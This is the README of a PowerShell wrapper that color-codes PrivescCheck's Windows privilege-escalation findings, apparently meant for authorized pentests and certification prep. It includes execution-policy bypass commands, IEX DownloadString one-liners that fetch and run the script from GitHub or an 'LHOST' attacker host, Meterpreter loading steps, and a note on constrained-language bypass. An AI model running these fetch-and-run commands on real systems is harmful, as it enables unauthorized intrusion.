A color output wrapper for PrivescCheck by @itm4n.
Intercepts PrivescCheck's terminal output functions and replaces them with ANSI severity-colored rendering. All detection logic is unmodified. The wrapper introduces no new enumeration capability.
PrivescCheck assigns a severity level (High, Medium, Low, Info, None) to every check result but outputs everything in plain text. During a time-pressured engagement — or in a WinRM session with a narrow terminal — identifying actionable findings in a long plain-text scroll is slow.
This wrapper replaces the two output functions (Write-CheckBanner, Write-CheckResult) after the original script loads, substituting color-coded rendering without touching any detection code. The approach is a function-level override in the global scope rather than a source patch, so it remains compatible with future PrivescCheck releases without modification.
[HIGH] Red Immediate privilege escalation vector
[MED] Yellow Exploitable misconfiguration
[LOW] Cyan Low-confidence or informational finding
[PASS] Green Check completed, no issue found
keyword Magenta Sensitive string highlighted inline (privileges, credentials, paths)
powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor"powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended"powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended -SeverityFilter Medium"powershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -Extended -Report out -Format HTML"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kowalski-analysis/PrivescCheck-Color/main/Invoke-PrivescCheckColor.ps1'); Invoke-PrivescCheckColor -Extended -SeverityFilter Mediumpowershell -ep bypass -c ". .\Invoke-PrivescCheckColor.ps1; Invoke-PrivescCheckColor -SourceScript C:\tools\PrivescCheck.ps1"| Parameter | Type | Description |
|---|---|---|
-Extended |
Switch | Enable extended checks |
-Audit |
Switch | Enable audit checks |
-Experimental |
Switch | Enable experimental checks |
-Risky |
Switch | Enable checks that may trigger endpoint protection |
-Force |
Switch | Run when executing as administrator |
-Report |
String | Write results to a report file with this prefix |
-Format |
String | Report format: TXT, HTML, CSV, XML |
-SeverityFilter |
String | Suppress results below this level: High, Medium, Low, Info, None |
-NoColor |
Switch | Disable ANSI escape sequences |
-NoLogo |
Switch | Suppress the header block |
-SourceScript |
String | Path or URL to a specific PrivescCheck.ps1 |
upload Invoke-PrivescCheckColor.ps1
. .\Invoke-PrivescCheckColor.ps1
Invoke-PrivescCheckColor -Extended -SeverityFilter MediumSet a session timeout before running — default 15s is insufficient:
msf6 > sessions -t 300 -i 1
meterpreter > load powershell
meterpreter > powershell_import /local/path/Invoke-PrivescCheckColor.ps1
meterpreter > powershell_execute "Invoke-PrivescCheckColor -Extended -SeverityFilter Medium"
Get-Content .\Invoke-PrivescCheckColor.ps1 | Out-String | Invoke-ExpressionIEX (New-Object Net.WebClient).DownloadString('http://LHOST/Invoke-PrivescCheckColor.ps1'); Invoke-PrivescCheckColor -SeverityFilter HighPrivescCheck calls Write-CheckBanner and Write-CheckResult for every completed check. After loading the original script, this wrapper overrides both functions in the global PowerShell scope. The new implementations:
- Read the
.Severityproperty already set by PrivescCheck's detection logic - Map it to an ANSI color code
- Scan property values for a fixed list of sensitive strings (privilege names, credential keywords, writable system paths) and highlight matches in a distinct color
- Apply the
-SeverityFilterthreshold to suppress low-value output during triage - Collect all results and print a summary with per-severity counts and a named list of High/Medium findings at the end
The detection functions, severity assignments, check registry, and all enumeration logic are untouched.
The following classes of strings are highlighted in result output when matched:
- Exploitable privileges:
SeImpersonatePrivilege,SeAssignPrimaryTokenPrivilege,SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege,SeTakeOwnershipPrivilege,SeLoadDriverPrivilege - Misconfiguration indicators:
AlwaysInstallElevated,Unquoted,AutoRun,Autologon,DefaultPassword - Credential keywords:
password,cleartext,plaintext,NTLM,SAM,LSA,credential,token - High-value identities:
NT AUTHORITY\SYSTEM,BUILTIN\Administrators,Everyone - Sensitive paths:
C:\Windows\System32,C:\Windows\SysWOW64,C:\Program Files\
| Environment | Status |
|---|---|
| PowerShell 2.0+ | Supported (PSv2 compatibility maintained for CLM bypass) |
| PowerShell 5.1 | Supported |
| PowerShell 7.x | Supported |
| WinRM / Evil-WinRM | Supported |
| Meterpreter powershell extension | Supported (set session timeout) |
| ANSI-capable terminal (Windows Terminal, most Linux PTYs) | Full color output |
| Legacy cmd.exe console on older Windows | Automatic fallback to plain text |
PrivescCheck-Color/
├── Invoke-PrivescCheckColor.ps1 Main script
├── README.md
├── CHANGELOG.md
├── LICENSE
└── .gitignore
This tool is for authorized penetration testing and security research only. Do not use against systems without explicit written authorization. The author accepts no liability for misuse.
All vulnerability detection, enumeration logic, severity classification, and the PrivescCheck framework are the work of Thomas Lacroix (@itm4n).
| Original project | https://github.com/itm4n/PrivescCheck |
| Original license | BSD 3-Clause |
This wrapper was written by kowalski-analysis for pentesting certification exam preparations and authorized engagement use. If you find it useful, consider starring the original PrivescCheck repository.
BSD 3-Clause. See LICENSE. Inherited from the original PrivescCheck project.